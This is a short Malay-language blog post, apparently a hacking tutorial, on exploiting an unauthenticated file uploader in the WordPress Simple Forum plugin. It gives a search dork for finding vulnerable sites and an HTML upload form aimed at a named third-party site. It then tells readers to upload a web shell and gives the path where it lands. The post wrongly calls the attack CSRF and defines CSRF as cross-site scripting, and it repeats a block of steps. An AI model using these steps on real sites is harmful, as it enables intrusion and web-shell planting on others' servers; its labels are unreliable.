dah lama x update blog nie
ok hari ni ku nak ajar korang cara hack website dengan method CSRF ?
apa 2 CSRF??
CSRF ialah cross site scripting
haha betul x aku xtau ok jom mula :D
dork : inurl:/plugins/simple-forum/
tambah
/resources/jscript/ajaxupload/sf-uploader.php
kt belakang contoh akan jadi cmni
www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
dia akan kuar tulisan = error
kalau kuar acces denied x boleh la 2
poc dia
tambah
/resources/jscript/ajaxupload/sf-uploader.php
kt belakang contoh akan jadi cmni
www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
dia akan kuar tulisan = error
kalau kuar acces denied x boleh la 2
poc dia
<form enctype="multipart/form-data"
action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
upload poc dia dalam mana web save as.html
lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell
shell korang akan kuar kt sini
wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
ok Enjoy!!
